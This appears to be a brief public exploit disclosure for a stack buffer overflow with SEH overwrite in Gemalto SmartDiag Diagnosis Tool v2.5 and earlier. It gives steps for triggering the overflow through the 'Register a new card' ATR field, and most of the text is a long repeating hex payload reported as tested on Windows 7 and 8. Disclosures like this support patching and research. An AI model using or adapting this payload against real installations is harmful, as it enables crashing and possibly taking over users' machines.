Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow
SymDiag.exe is vulnerable to buffer overflow, SEH overwrite. When trying to (Register a new card), Input fields are vulnerable to stack overflow attack which leads to code execution and other possible security threats. To exploit, start SmartDiag.exe tool, choose 'Register a new card', on the ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag v2.5): 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 400052834000528340005283400052834000528340005283400052834000 528340005283400052834000528340005283400052834000528340005283 40005283400052834000528340